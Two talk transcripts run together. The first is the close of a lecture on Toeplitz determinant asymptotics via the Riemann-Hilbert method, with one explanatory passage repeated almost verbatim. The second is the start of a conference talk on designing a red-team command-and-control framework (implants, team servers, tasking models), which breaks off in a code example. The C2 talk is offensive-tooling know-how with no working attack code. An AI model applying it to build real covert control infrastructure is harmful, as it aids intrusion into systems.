So in fact my integration was originally over C for z and over C_plus for s, and I have to move C_plus inside and swap them; what is written is correct up to a residue picked up when I move the contour, and, again as a kind of homework, that residue is of the same type as I_2 and equals zero, so it does not contribute. So in principle the formula is correct, although just referring to the symmetry of the integrand is of course not enough. But now we are practically done, because this is a total derivative with respect to γ. I integrate with respect to γ, the lower limit gives nothing, and I get the double integral over C and C_plus of log φ(z) log φ(s)/(s - z)^2 ds dz/(2πi)^2, with no γ anymore. Now it is just one more line to see that this is the formula Szegő wrote for the constant term. What I suggest is to write it as the integral over C of log φ(z) times the z-derivative of the integral over C_plus of log φ(s)/(s - z) ds/(2πi), dz/(2πi); again I use that 1/(s - z)^2 is a derivative with respect to z. Now I expand: since on C_plus the variable s is larger in absolute value than z, I write the geometric series, so 1/(s - z) becomes the sum over k of z^k s^{-k-1}. There is no γ anymore, I have already integrated over it, and that is the whole point. Differentiating in z gives k z^{k-1}, summed over k from 1 to infinity, and the inner integral over C_plus of log φ(s) s^{-k-1} ds/(2πi) no longer cares whether I write C_plus or C: it is just the k-th Fourier coefficient of log φ. So I get the sum over k from 1 to infinity of k (log φ)_k times the remaining integral over C of log φ(z) z^{k-1} dz/(2πi), and that last integral is (log φ)_{-k}. So I_1 is the sum of k (log φ)_k (log φ)_{-k}, and this is the strong Szegő theorem, although under very favorable analyticity conditions. It is an illustration of how we can reproduce, at least under strong analytic assumptions, one of the most famous theorems about Toeplitz determinants; if we could not do that, we should stop developing the technique.

So now, what next? Today and tomorrow, and here I will probably switch the order relative to what Estelle is doing, I am going to discuss singular symbols. This is where, doing things through the Riemann-Hilbert problem, we very naturally arrive at the appearance of special functions, both special functions of hypergeometric type and special functions of Painlevé type.
And they will not only appear; we will also obtain a somewhat non-standard point of view on special functions. There is a lot of technical work in what comes next, and I will try to avoid as much of it as I can, but I also want to emphasize that we will not merely manage: we will develop some new conceptual things. In particular, a relation will be established, very naturally, between even the classical special functions and the monodromy theory of linear systems, and it will be essential in what I am doing. But that is for tomorrow; now I will just start. So: Fisher-Hartwig asymptotics, Fisher-Hartwig symbols. I will consider the simplest situation: the symbol is e^{V(z)}, the Szegő part, the smooth part, with V analytic in the annulus, times a single singular factor at the point z = 1 which combines a root singularity |z - 1|^{2α} and a jump singularity, with 2α greater than minus one. This is the simplest situation with Fisher-Hartwig symbols: just one singularity. As a whole this symbol does not satisfy my analyticity condition in the annulus, and it does not even satisfy the much more general conditions in Estelle's theorem; there is no way to get the Szegő asymptotics.

Let me write the answer, by the way. The answer is this: there is the Szegő exponential term coming from V, which is what we just had; the strong Szegő constant generated by V; then a factor which is a sort of mixture between the singularity and the Szegő part, not very interesting in itself, but it means that even the constant is not exactly what it used to be; and then, more importantly, there is a qualitative change in the asymptotics, a power-like factor n to the power α² - β². Moreover, the part of the constant which comes from the singularity is the famous ratio G(1 + α + β) G(1 + α - β) / G(1 + 2α), where G is the Barnes G-function; and of course this is asymptotics, so there is a little-o correction as n goes to infinity. The Barnes G-function is a kind of discrete antiderivative of the gamma function: it satisfies the functional relation G(z + 1) = Γ(z) G(z), it is entire, it has zeros at the negative integers, and, just as for the gamma function, there are formulas for it in terms of products and contour integrals.

A bit of history. The e^V term is what makes the problem nontrivial: without it, the corresponding determinant can be written explicitly. Remember the n-fold integral I wrote at the beginning for the Toeplitz determinant; without the e^V term it is a famous special case of the Selberg integral, it can be evaluated by the Selberg formula, and the asymptotics can be worked out. That is what was used to formulate the conjecture. Of course, the really interesting part is when you have several singularities of this type.
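Schematically, and only at the level of the structure just described (the precise form of the mixed constant, written here as C(α, β; V), couples the Fourier coefficients of V with α and β and is not reproduced), the single-singularity Fisher-Hartwig asymptotics reads:

\[
\varphi(z)=e^{V(z)}\,|z-1|^{2\alpha}\times(\text{jump }e^{\pm i\pi\beta}\text{ at }z=1),
\qquad \operatorname{Re}(2\alpha)>-1,
\]
\[
D_n(\varphi)=\exp\!\Big(nV_0+\sum_{k\ge1}kV_kV_{-k}\Big)\;
n^{\alpha^2-\beta^2}\;
C(\alpha,\beta;V)\;
\frac{G(1+\alpha+\beta)\,G(1+\alpha-\beta)}{G(1+2\alpha)}\,\big(1+o(1)\big),
\]
\[
G(z+1)=\Gamma(z)\,G(z)\qquad(\text{Barnes }G\text{-function}).
\]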
There is a similar formula, of course more involved, for several singular points. As for the history, I believe Estelle is going to tell you about it, and she contributed a lot to it, so let me just give the names. Fisher and Hartwig conjectured it in 1968, from physical considerations, and Lenard was also involved. Then Widom proved it in the absence of jumps; then Estelle proved it for jumps, first with the real part of β equal to zero, then with real part less than one half; then Böttcher and Silbermann proved it for general α with the real part of β less than one half; and finally the optimal result was obtained by Torsten Ehrhardt. That is the story; and then there was a further conjecture. So this has been a very important development and a very important piece of the theory of Toeplitz determinants. And now I am going to explain, more or less, how this can be approached through the Riemann-Hilbert method. Again, my goal is not to prove it, but mostly to indicate the role of the different special functions that show up. One second, let me first clear the board.

What do I mean by the exponential factor in the function φ? The e^V is the smooth, analytic term, and then there is the root singularity and the jump singularity; I did not say it explicitly, but the branch of the power of z is fixed so that at the point one the symbol has the jump e^{±iπβ}. Is φ defined on the circle? Yes, it is defined on the circle. Now, to be precise, I want to note that this singular factor can be rewritten, and let me be exact, because everything here is sensitive and one must not make a mistake with the branches: the absolute value raised to its power, together with the jump factor, can be written as a product of a power of (z - 1), a power of z, and the constant e^{-iπ(α + β)}. Here the branch of the power of (z - 1) is taken with the cut from 1 to infinity and the argument running from 0 to 2π, and the branch of the power of z is taken with the cut from 0 to infinity. It is a good exercise, not a very difficult one, on multivalued functions. Why does it work? You see, |z - 1|^{2α} is (z - 1)^{α} times (z̄ - 1)^{α}, and on the unit circle z̄ is 1/z, so the second factor is (1/z - 1)^{α}: this is how you get the rewriting, but you have to be careful with the branches, and you can check that this is the correct choice.
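The elementary identity behind this rewriting, before any branches are fixed, is the following; on the unit circle z̄ = 1/z, so

\[
|z-1|^{2}=(z-1)(\bar z-1)=(z-1)\big(z^{-1}-1\big)=-\frac{(z-1)^2}{z},
\qquad
|z-1|^{2\alpha}=(z-1)^{\alpha}\,\big(z^{-1}-1\big)^{\alpha},
\]

and the even, non-analytic factor thus splits into a piece whose cut can be pushed from z = 1 out to infinity and a piece whose cut can be placed through the origin, at the cost of constant phase factors determined by the branch choices.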
So now my φ is not analytic in an annulus, of course, but it still has a lot of analyticity away from the point one, and the idea is that in my Riemann-Hilbert problem I proceed as before. My first step is the same: I go to T(z), which is Y(z) z^{-n σ_3} for |z| greater than one and Y(z) for |z| less than one. For T I again get the jump with z^n, φ, z^{-n}, and I can again use the same factorization into a lower-triangular factor with z^{-n} φ^{-1}, the off-diagonal factor with φ and -φ^{-1}, and a lower-triangular factor with z^n φ^{-1}. The idea, as before, is to introduce the next function S, where S equals T times the factor with z^{-n} φ^{-1} in domain two, T times the factor with z^n φ^{-1}, with the appropriate sign, in domain three, and T in domains one and four. But what are the domains one, two, three, four now? Before, they were the full annular strips between the smaller circle, the unit circle, and the bigger circle. Now I can analytically continue φ only away from the point one, so domain two, which before was the full outer strip, and domain three, which before was the full inner strip, have to stay away from that point; this is domain two, this is domain three, and this is domain four together with domain one. So now we have this picture, and we see that there is going to be a difference between the approximation of my solution outside a small neighborhood of the point one and inside it. On the new arcs I again have jump matrices which are exponentially close to the identity, but only away from the point one. So where before I could simply throw those contours away, now I cannot; in addition to my S-infinity I will have to analyze what is going on near the point one. I now need two parametrices, a global one and a local one. By the way, the jump matrices for S are exactly as they used to be: on the new arcs they are those triangular matrices, and on the circle it is still the off-diagonal matrix with φ and -φ^{-1}.

So first, one expects that at least outside a small neighborhood of the point one the solution is well represented by the same S-infinity, which I am now going to call the global parametrix, P-infinity. It still satisfies the jump with φ and -φ^{-1} on the unit circle and is the identity at infinity, and I can formally write the same formula for it: d^{σ_3} times the identity outside and times the constant off-diagonal matrix inside. (How much time do I have? Okay, thank you.) Of course, d is now going to have a singularity at z equal to one: I can write the same integral formula for the Szegő function d, but it will be singular at z equal to one. But I don't care: I am not going to use my P-infinity in the neighborhood of z equal to one; I am going to use it outside, and outside it is fine. I can even calculate those integrals.
So first I expect that, at least outside this small neighborhood, the solution will be well represented by this S-infinity, which I am now going to call the global parametrix, P-infinity; it still satisfies the jump with zero, phi, minus phi inverse, zero on the unit circle, and it is the identity at infinity. I can formally write exactly the same formula for P-infinity: D to the sigma-three times the identity outside, and D to the sigma-three times the matrix with zero, one, minus one, zero inside. (How much time do I have? Okay, thank you.) Of course, now D is going to have a singularity at z equals one. I can write the same integral formula for the Szegő function D, and it will of course have a singularity at z equals one, but I do not care: I am not going to use my P-infinity in the neighborhood of z equals one, I am going to use it outside, and outside it is fine. I can even calculate those integrals, so D can really be given explicitly; this is the part corresponding to the Szegő function. Let me remind you (do I still have it? yes, it is still over there, very good) that V can be written as V-plus plus V-minus, where V-plus is the positive part of the Laurent series and V-minus is the negative part. That gives the simple factorization of the smooth, Szegő part. For the singular part it is this: the factor (z minus one) to the power alpha plus beta, times e to the minus i pi (alpha plus beta), let me just write it and then we can easily check it, is used when z is inside the unit circle, and e to the V-minus times ((z minus one) over z) to the power alpha minus beta is used when z is outside. So it is just a factorization by hand of this function, because a single analytic expression for phi no longer exists. Let me reconstruct it: my phi of z was e to the V of z, times (z minus one) to a power, times z to the power minus alpha plus beta, times e to the minus i pi (alpha plus beta). The e to the V part of the factorization comes, of course, from splitting V into its plus and minus parts, and for the singular terms, if you divide this by that you get exactly this, so the splitting exactly respects the plus and minus behavior. This piece is analytic inside the circle, because its cut goes from one to infinity, so inside the circle it is analytic; forget about the point one. And this piece is analytic outside, because now I can choose the cut between zero and one. So this is what you usually do when you have explicit algebraic functions to factorize; it is what people in diffraction theory do: just explicit factorization. So we are done with the global parametrix. Now the most difficult and interesting part is what to do with the local parametrix, and I am only starting it. The global problem I solved explicitly; can I solve my local Riemann-Hilbert problem explicitly? That is the issue. Okay, maybe I stop here, because we will do it tomorrow.
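Returning to the explicit factorization just described, here is a hedged sketch with the same assumed normalization as before; the exact exponents depend on that convention, but the splitting below is internally consistent with it.

```latex
% V(z) = \sum_k V_k z^k,\qquad V_+(z)=\sum_{k\ge 1}V_k z^k,\qquad V_-(z)=\sum_{k\le -1}V_k z^k .
% With the normalization assumed earlier, one consistent splitting of the symbol is
\[
  \varphi(z) \;=\;
  \underbrace{e^{V_0+V_+(z)}\,(z-1)^{\alpha+\beta}\,e^{-i\pi(\alpha+\beta)}}_{\text{analytic in } |z|<1}
  \;\cdot\;
  \underbrace{e^{V_-(z)}\,\Bigl(\tfrac{z-1}{z}\Bigr)^{\alpha-\beta}}_{\text{analytic in } |z|>1},
\]
% where (z-1)^{\alpha+\beta} is cut along [1,\infty), hence analytic inside the disk, and
% ((z-1)/z)^{\alpha-\beta} is cut along [0,1], hence analytic outside the disk and equal to 1
% at infinity. (Where the constant e^{V_0} is placed is a matter of convention.) The global
% parametrix is then built from D(z)^{\sigma_3}, with D given by these two factors inside and
% outside the unit circle respectively.
```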
There is a question: you said that this approach is not very good if you want to treat really general symbols? Yes; you see, with this analytic phi there is essentially no hard analysis involved. But are there problems of principle where you cannot do this, or is it just more convenient to do it another way? Well, I just asked Professor McLaughlin, who actually managed this: there is a way to treat more general phi. For instance, you can make rational approximations of your general phi, or analytic approximations; or, instead of deforming off the contour, you can use not the nonlinear steepest descent but the nonlinear stationary phase method. But again, if you want to produce the Szegő theory for the best possible classes of symbols, I would not recommend using the Riemann-Hilbert problem; that is what I would say. And the same applies here: at the same time, you can still make approximations of your given symbol. Once again, my message is that the method is great when you solve concrete problems. It is more or less like the asymptotic analysis of integrals, the steepest descent method for integrals: it is a road map for how to proceed. There are some textbooks where people try to produce general answers for the most general situations, but I do not think anybody uses them. Okay. A general question: I just wanted you to expand on how you constructed those contours. Yes. Let me remind you that in the previous, Szegő case there was the original circle C, and I created three more contours simply because I could move them: it was very natural that you can move one contour out of the unit circle, which immediately makes that jump matrix close to the identity, and if you move the other one inside, you immediately make the other jump close to the identity. So in the Szegő case it is very natural to introduce those. But now you have a nail in your picture; you have a point. You cannot move it, but you can squeeze the contours through it, and this is how we obtain this picture. In fact, if I have time tomorrow, I will explain the transition asymptotics between the Szegő and Fisher-Hartwig regimes, and this is where the Painlevé equations show up: it will be a double-scaling limit in which I have two points. Originally there is a nice symbol with two branch points, one outside and one inside the circle, and then I begin to move them together. But the point was that there is also another contour around the... oh, that is not a contour? No, no, this one is not a contour, I am sorry. It is my local problem: tomorrow I will take a microscope, zoom into this thing, and we will see. We have to construct explicitly, hopefully, a solution with exactly these jumps, but one that matches asymptotically with my global parametrix. That is the problem. So it is not a contour any more, although of course it will appear eventually: when I have constructed the parametrices and consider the ratio between the exact solution and the parametrix, I will arrive at a contour on which these pieces disappear. Eventually my transformation will be such that this contour looks like this; that is what I get after I construct both parametrices and match them.
Then I arrive at a contour on whose branches the jump is exponentially close to the identity, and that is the point: everything is close to the identity. Okay, just one more question. It is a question for both Alexander and Estelle: could you shed a little more light on the origins of why the asymptotics of Toeplitz determinants are of such interest? You mentioned a few examples; maybe you could tell us your favorite application. Well, there is a difference between the origin and the favorite application. Nowadays there are very many applications. But the origin, it is a very good question, and Estelle already mentioned how it went. First of all, Toeplitz determinants appeared originally in pure mathematics, with Otto Toeplitz, who was a student of David Hilbert. They decided to study Toeplitz operators as operators which on the one hand are still quite abstract, but not too abstract, so that you can say more; so it was these operators and their truncations. That is how it first appeared; I believe it was essentially the PhD work of Otto Toeplitz, though Estelle may know better. Then Szegő came and proved his weak theorem. Then there was a gap, and then, of course, the Ising model. The Ising model story would take too much time, so let me say it in a few words. Ising introduced the model to try to explain the phenomenon of ferromagnetism, the critical phenomenon you all know: you have a material which at low temperature has magnetic properties, and when the temperature is large it does not. So the Ising model was introduced as a lattice-spin statistical mechanics model, and in the two-dimensional case it indeed possesses this phenomenon of a phase transition; it was Onsager who showed that, and it was of course a great breakthrough. The next question was to study this phase transition in more detail, to study the magnetization and its asymptotic behavior with respect to the distance on the lattice. The whole point was that this magnetization, as a function of n, is given by a Toeplitz determinant for some particular symbol, an algebraic symbol. Then Onsager and Kaufman began to calculate the asymptotics, and the interesting thing is that if you use just the weak Szegő theorem you get nothing, because the leading term cancels out for a rather trivial reason: the magnetization is precisely the constant in these asymptotics. So first they derived it by themselves, not rigorously; then Szegő, again within some months, came up with the strong Szegő theorem. That was the late forties. Then again there was a small gap, and then came the next breakthrough in the relation between Toeplitz determinants and physics and statistical mechanics (there were more things in between, which were very helpful), namely the works of the people
that I mentioned: Wu, McCoy, Tracy, and Barouch. They were the ones who first studied this critical phenomenon, this transition, when T goes to the critical temperature, and they discovered the appearance of Painlevé III. That was perhaps one of its very first appearances, around 1976, and actually, if I have time, I plan to talk about it. And this is now the general situation: whenever you have some critical phenomenon to describe, especially in an integrable situation, it is always Painlevé functions. We have time for a short question. Yes, about the constant term in the strong Szegő theorem: today, in the operator approach, we saw the term k times V_k V_{-k}... In the classical, scalar case it is what I just wrote: e to the sum of k V_k V_{-k}. But that is the scalar case; in general it is given by an operator (Fredholm) determinant. Yes, but my question is: today we saw a kind of explanation of the structure k V_k V_{-k} coming from that representation; is there a way to explain this structure using classical analysis? No, I do not think so; in the Riemann-Hilbert approach I just derive it. If I start doing the matrix symbol case, then two things might happen; I can arrive at this interpretation, but two things are important. Maybe I am not answering your question, but let me use it to raise some very interesting issues. What we have (yes, I forgot what it was, something like this) is this determinant identity. The result has great theoretical value, but from the practical, computational point of view it is not easy to use, because it is in a sense the statement that one infinite determinant equals another infinite determinant; of course this infinite determinant makes sense. Then Widom himself showed that, because of commutativity, which is the very important issue, we arrive at this formula in the scalar case. He also showed that in the cases when phi has only finitely many terms in its Laurent series, it can in fact be reduced to a finite determinant. And then, in Estelle's work and also in our related work with Mezzadri, it turns out that for some algebraic matrix symbols this can be explicitly calculated in terms of theta functions, Riemann theta functions. So that is a somewhat different story. But the interesting thing is that there is a very recent conceptual development here: although I said at the beginning that this formula is not of much practical use, that is no longer quite correct, because there is very interesting work by Oleg Lisovyy and his co-authors. First of all, they identify this constant with something which is very fashionable in monodromy theory, the tau function. And even more, they show that you really can use it and make it effective for calculating the asymptotics and this constant. So these are very interesting back-and-forth developments.
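For reference, the constant term being discussed is the one in the strong Szegő limit theorem. It is stated here as a reminder in its standard scalar form (with V_k the Fourier coefficients of the logarithm of the symbol); the Fisher-Hartwig remark at the end is a standard fact quoted for orientation, not a formula from the lecture slides.

```latex
% Strong Szegő limit theorem for a smooth, non-vanishing symbol f = e^{V} with zero winding number:
\[
  D_n(f) \;=\; \exp\Bigl( n\,V_0 \;+\; \sum_{k=1}^{\infty} k\, V_k V_{-k} \Bigr)\,\bigl(1+o(1)\bigr),
  \qquad n\to\infty,
  \qquad V_k=\frac{1}{2\pi}\int_0^{2\pi} V\bigl(e^{i\theta}\bigr)\,e^{-ik\theta}\,d\theta .
\]
% With a single Fisher-Hartwig singularity the asymptotics acquire an extra algebraic factor
% n^{\alpha^2-\beta^2} and a constant expressible through Barnes G-functions; it is this
% constant, and its operator-theoretic counterparts for matrix symbols, that the question
% refers to.
```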
Okay. If your symbol is very special, say a two-by-two matrix symbol, there are a few things you can say that are reasonably general. Should I say that again? What I said is that I completely agree with all those statements: this is a very nice theoretical result, but it is not useful in general for computing things. There are some cases you can do, some almost by accident, and in the case where the matrix is just two by two there are some general results, but you have to find the particular quantities that go with those two-by-two symbols. Yes. We would really need a whole workshop devoted to the matrix, block Toeplitz determinants. I would also mention that in our approach the key issue is that if the symbol is a matrix, then this global parametrix becomes a problem: it is a genuine Wiener-Hopf factorization, I have to factorize a matrix symbol now. That is the issue from this point of view. Okay, let's thank Professor Its again. Thank you.
Starting with Onsager's celebrated solution of the two-dimensional Ising model in the 1940s, Toeplitz determinants have been one of the principal analytic tools in modern mathematical physics; specifically, in the theory of exactly solvable statistical mechanics and quantum field models. Simultaneously, the theory of Toeplitz determinants is a very beautiful area of analysis representing an unusual combination of profound general operator concepts with highly nontrivial concrete formulae. The area has been thriving since the classical works of Szegő, Fisher and Hartwig, and Widom, and it very much continues to do so. In the 1990s, it was realized that the theory of Toeplitz and Hankel determinants can also be embedded in the Riemann-Hilbert formalism of integrable systems. The new Riemann-Hilbert techniques proved very efficient in solving some of the long-standing problems in the area. Among them are the Basor-Tracy conjecture concerning the asymptotics of Toeplitz determinants with the most general Fisher-Hartwig type symbols, and the double-scaling asymptotics describing the transition behavior of Toeplitz determinants whose symbols change from the smooth, Szegő type to the singular Fisher-Hartwig type. An important feature of these transition asymptotics is that they are described in terms of the classical Painlevé transcendents. The latter are playing an increasingly important role in modern mathematics; indeed, the Painlevé functions are now very often called "special functions of the 21st century". In this mini-course, the essence of the Riemann-Hilbert method in the theory of Toeplitz determinants will be presented. The focus will be on the use of the method to obtain the Painlevé-type description of the transition asymptotics of Toeplitz determinants. The Riemann-Hilbert view on the Painlevé functions will also be explained.
10.5446/54337 (DOI)
Hello everyone, I hope you're all having a wonderful village. Welcome to my talk, Designing a C2 Framework. My name is Daniel Duggan, otherwise known as RastaMouse. I'm the director of Zero-Point Security; you may have seen our Red Team Ops course. I blog over at rastamouse.me, as well as in a few other places, and I'm on Twitter, GitHub, Discord, Slack, all the things, so if you want to get in touch with me after the talk, by all means do so. So what inspired this talk? Well, it feels to me like, prior to around 2018, there weren't really that many C2 frameworks available. The main commercial offering was probably Cobalt Strike, maybe a few others, and there weren't that many open-source frameworks either. We had PowerShell Empire for a long time, we had PoshC2 for a long time, and then Covenant came along and some others came along, and suddenly we had this huge boom in these C2 tools coming out. We've also had a lot more commercial ones as well, so it seems to be an area of interest for sure. And it's not infrequent that I get approached by people asking if I've got any tips on how to build C2, specifically in C#. So I thought this kind of talk would be helpful for those looking to take on the process of putting such a tool together. Now, if you go over to the C2 Matrix, a curated list of commercial and open-source frameworks, it now lists over 70, which is pretty astounding really, in more than 10 languages: everything from Python, Go, Rust, C#, Ruby, even PowerShell. There's no shortage of variety, and they all have different capabilities. Some by default will do C2 over HTTP, some will go over DNS, some will go over completely custom channels, and some might ride on legitimate services like Dropbox, Office 365, or different Google services. If you're interested in learning more about some of the frameworks or C2 tools already out there, I highly suggest you check out the matrix; it has a really useful search tool where you plug in your requirements and it will recommend some tools based on them. So let's take a step back and talk about C2. What is C2? Well, C2 is short for command and control. Imagine a scenario where you have an operator and a target, and the operator delivers some sort of implant or payload, sometimes also called a RAT, to that target. The operator needs to maintain some control over that implant somehow: the implant needs to talk to the operator, the operator needs to be able to give it commands, and the implant needs to give the results back to the operator. The model that is used most, I guess, is to have some sort of intermediary control server, often called a team server. The implant communicates with the team server over some protocol; again, that might be HTTP or DNS or some other legitimate service. The operator has some sort of admin interface to that control server, so the implant talks to the control server and appears to the operator, the operator can give it tasks, and the implant grabs those tasks from the server, executes them, and sends the results back. It's worth noting that some of these servers have the admin interface built into them, while others require the operators to have a standalone client that connects to the server. So, conceptually, not too complicated.
However, the point of this talk is about designing a C2 framework, not just designing C2, and for the purposes of this talk we need to understand that C2 is not the same as a framework. If you go onto the matrix again, for example, you'll see a lot of C2 tools that don't really provide that much flexibility to the operator. Maybe a lot of those tools were designed with the idea of demonstrating C2 over Office 365, for example, and that's pretty much all they're capable of. To me, that's not really a framework, and this talk is all about frameworks. So what does a framework provide? The properties are quite clearly listed here, so let's go through them. The first is inversion of control: the overall flow of the programs involved in this whole process is not strictly controlled by the user. The flow is that the implant talks to a server, the operator tasks that implant, and you have that back and forth; that flow is not controlled by the user. You also have, on the server side and on the implant side, a lot of internal flows: the implant receives a job, processes it in some way, and sends the results back. That internal flow is not controlled by the operator, and a lot of flows internal to the team server are not necessarily controlled by the user either. A framework also provides default behaviors, but, most importantly, behaviors that can be overridden by the operator. Again, think of the protocol the implant talks over, or the protocol the team server listens on: a framework may provide a default such as HTTP, but the operator should be allowed to override that in some way, either by changing the behaviors within that protocol or by adding their own completely custom protocols. A framework also provides extensibility, that is, the ability to introduce new behaviors and capabilities that are not currently within the tool set. If you think about implants, you might ship your implant with a couple of commands, but it needs to be customizable: operators need to be able to add their own commands and their own post-exploitation capabilities, and they need to be able to do that on the server side as well. For example, if you want reverse port forwarding on your implant, you need to be able to introduce that capability to the implant, the implant needs to send that data somewhere, probably the team server, the team server needs to relay that traffic to wherever it needs to go, and then it needs to send the traffic back. Both sides of that process need to be extensible by the operator to accommodate that. A framework also provides reusable components, which I think is self-explanatory: components that the framework provides to make the operator's life easier. We'll see an example of that on the next slide. This example is taken from the Metasploit Framework. Metasploit is a very mature product at this point, and it's great to look at if we're looking for inspiration on those framework-y things. If you're not familiar with Metasploit, anybody can write a new module or an exploit module for the framework for other people to use. And being a framework, it provides a lot of helpers for you when writing those modules. This example is taken from the PsExec module.
The first thing you do in a module is define some module information: a name, a description, an author or multiple authors, references, and so on. That information is picked up by the rest of the framework, so that as the operator, while you're using the UI and you search for a module, you can search it by name, it comes up, and you can see its name, its description, and a bunch of other things. You can also register options. This being a PsExec module, the author has said you can define options for the service name, paths, and a bunch of other things that are important to that module. More importantly, there are some options that you don't have to explicitly define in the module. The framework knows that this is a remote exploit module, so it knows it needs RHOST, your targets, and the author of the module doesn't need to specifically put that in as an option; the framework already knows it's required. That takes the burden off the module author. You also have includes and helpers, which are down here. These includes are other Metasploit modules that you can bring into your module. Because this module is using PsExec over SMB, and there's already a module for that, you don't have to implement an entire SMB library, or even the whole PsExec process, in your module. It's bringing in PowerShell and executable generation because you need to execute something, so as the author of the module you don't even have to worry about the payload you're going to send; the framework does it for you. And you can see here that the service file name is an option: if you haven't defined it, it takes the default, and these are default behaviors. If you haven't provided a name, it just makes a random one for you, and that rand_text_alpha is another helper in the framework, so you don't have to think, okay, I want a random string, now I have to write a function for that; it's in the framework already. Those are the biggest strengths of frameworks: as the module author, they allow you to focus on the task that you want and not worry about the things you don't want to worry about. Okay, so where to start? Well, this seems pretty cliché, but the first thing you should really understand is: what are your motivations? What does success look like? That kind of sounds like we're at some sort of management retreat, but you really need to think about what you're actually trying to achieve, because you need to build it, and you need to know what it's going to look like at the end. You might be doing this just for fun, or just to teach yourself some stuff; you might want to teach other people; you might be writing an internal tool if you're a pentester or a red teamer; you might even want to sell it, or open-source it. If I had to draw some sort of parallel, I think about building a car: it's very easy to say you're going to build a car, but there are a lot of different types of car, right? If you want something to take your family to the beach, you probably don't want a McLaren P1.
And likewise, if you want to go around the Nürburgring quickly, you probably don't want some sort of absurd people carrier. Even though they're both cars, they are quite different, and they have different features to make that goal a reality. There are all sorts of things that you could think would be really cool to have in your framework, but if they don't contribute towards what you're actually trying to achieve, then they're kind of pointless. And if you miss features that you need, then you're not going to achieve your goal, and you'll end up with something you didn't want. If you've never seen MoSCoW, this is a pretty good way to try and narrow down what you think you want. It stands for must have, should have, could have, and won't have. Your must-haves are the mandatory things, the things your framework absolutely has to have to perform its function. Should-haves are important and add significant value, but they are not strictly mandatory to function. Could-haves are nice to have but not really important, and won't-haves are the least critical, inappropriate, or undesirable. The won't-haves you can split into two camps: won't have, period, and won't have this time; I'll expand on "this time" in a minute. So what you really want to do is get your goal straight and think about all the things you think you might want in your tool. You can also take inspiration from other frameworks and tooling; I don't think that's cheating, because you want the best parts of everything, and why reinvent the wheel? You can take good ideas from all sorts of places, and that's perfectly fine in my book. Then what you want to do is narrow everything down to an attainable first release using that MoSCoW method. By attainable, I mean attainable within your current skill set and your time budget. I think a mistake a lot of people make is to look at things that have been out there for a long time, like Empire, the Metasploit Framework, Covenant, PoshC2, and all of those well-established projects, and think, that's what I want to build, my version of that framework. But those projects didn't get there overnight; they didn't just pop out of nowhere at the quality they are now. Some of them are months or years old. So if you're trying to replicate that straight off the bat, you've probably got easily six or twelve months' worth of work. What's going to happen is you'll work on it for a couple of months, or however long you can stand, you'll get fed up with it, get demotivated, and put it to the side. You'll come back to it maybe at some point, look at it, and think, well, I've only done about 20% of what I hoped to achieve, and you're probably not going to pick it up again; it ends up in the software graveyard. Small, iterative releases are easily more achievable and far more likely to keep you motivated, and you're also going to grow your project with your skill set. You look at a lot of the features in advanced frameworks now, and
they're pretty advanced concepts, so if you're doing this to teach yourself coding, it's probably not realistic to shoot for those kinds of features. Having a small project that's 100% complete is a lot better, and a lot more satisfying, than a large project that's 10% or 20% complete. So when I say attainable first release, it's probably the bare minimum of what makes a C2 framework function: no bells or whistles, but something to aim for. You can set yourself a schedule and say, I'm going to target my initial release in one month, or whatever you think is realistic. You've got your MoSCoW, your must-haves and your should-haves, and you're probably going to prioritize those the most; the could-haves you're probably not going to worry about too much, because you just want something that's going to function and work. And you need to be cognizant of scope creep. It's really easy to think, I'll just add this, and I'll just add this; people post things on Twitter all the time, did you know you could do this, new techniques, and so on, and it's really easy to try and add those in, when really what you want to do is stick to what you had planned for this release. If you see cool stuff coming into the public domain, you can say, okay, I'm not going to do it now, maybe I'll do it in the next release. And for God's sake, pace yourself. Two hours a day for a month is not the same as twelve hours on four Fridays in a month. Maybe this is just a personal thing for me, but little and often is just a more enjoyable way to code than having to sit at your desk for however many hours because you feel like you need to get something out. So let's talk about languages for a sec. There are a billion different languages out there, and you're going to have to decide on something for your server and your implant; depending on your model, you might consider writing a client for the operators as well, but I'm just going to focus on the server and the implant. For the server side, I think you're much better off building on a web framework that already exists. You have Python ones like Flask and Django; in C# you have Blazor, which provides a nice web UI, or you can have something driven more by APIs or RPC, with lots of front-end options like Vue, React, and Angular. On the implant side, you have to think, and this goes back to your goals, about what platform you really want to target with your framework. You can make your framework implant-agnostic, and a lot of them already do that, like Mythic, where you can write your own implants for the framework, and that would be really great if your framework did that; but you probably also want to include an implant, just to make it easier for people to pick up and use. So you have OS-specific languages, like C# targeting the .NET Framework or Swift on macOS; you have languages that cross-compile, like Nim and Go and Rust; and then you have proper cross-platform options, like .NET Core and, sort of, Python. You certainly need to consider how these elements are going to talk to each other, and which language facilitates that best.
So, you know, I've already said that the control server should provide a means of communicating with your implant over any protocol, or any means you want. So you have to consider: is the framework I'm choosing going to facilitate that? Can I do that in Python, for example? And then you consider, well, if my chosen language doesn't really do that, do I need a different language? And if you don't know that language, is it worth learning, or is it worth sticking to what you know and making do the best you can? I think that's a decision only you can make, based on your goals and your priorities. If you're doing this as a learning process, then maybe it's worth it; maybe you specifically want to use this project as an opportunity to learn, say, C#, and that's a pretty popular choice, so by all means step out of your comfort zone. And that goes back to the attainable first release thing: if you're learning something new, you've got to start small with it. In terms of design patterns, there are two that I really go for. The first is the command design pattern, and I think this is pretty good for picturing the flow of stuff between the different components, and by components I mean separate components such as the server, the implant, and the operator, not things internal to any one of them. We have the operator, which is kind of like the client, and the operator wants to send a task to an implant. So you're probably going to send some information, maybe over an API, you're going to post this data to your team server, which is kind of like the director in this design pattern. In this example I've got a simple task model that has a command and some arguments, and I want to task an implant that we identify by a GUID. The server then takes that task and sends it to the implant; that's kind of like the command. And then the implant, which is the receiver, executes the task. Now, I've highlighted the task GUID here because it's in the model that the server deals with, but it's not in the model that the operator sends. If I want my server to track task progress with the implant, it's going to need something, so my server in this example adds a GUID to every task, and then when the implant talks back to the server it reports using the same GUID, so the server can track commands with the implant. And this brings me on to the subject of contracts. You have contracts between the different elements of the overall solution: between the operator and the server, between the server and the implant, and maybe even between the server and any storage you want, if you're storing data so you can start and stop your team server without losing it. What you really need is different models for each of those contracts; don't try to use the same model between every element, because you're just going to get a little bit unstuck. So here's a code example of a task request: this is what an operator might post to the server. It's got a command, an array of arguments, and an artifact. If this was an execute-assembly command, the artifact would be the whole assembly.
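The speaker's slides aren't reproduced in the transcript, so here is a hedged C# illustration of the "different model per contract" idea being described; all class and property names are hypothetical, not the speaker's actual code.

```csharp
// Hedged sketch of the three contract models described above: one per hop.
using System;

// Operator -> team server: what the operator posts to the API.
public class OperatorTaskRequest
{
    public string Command { get; set; }
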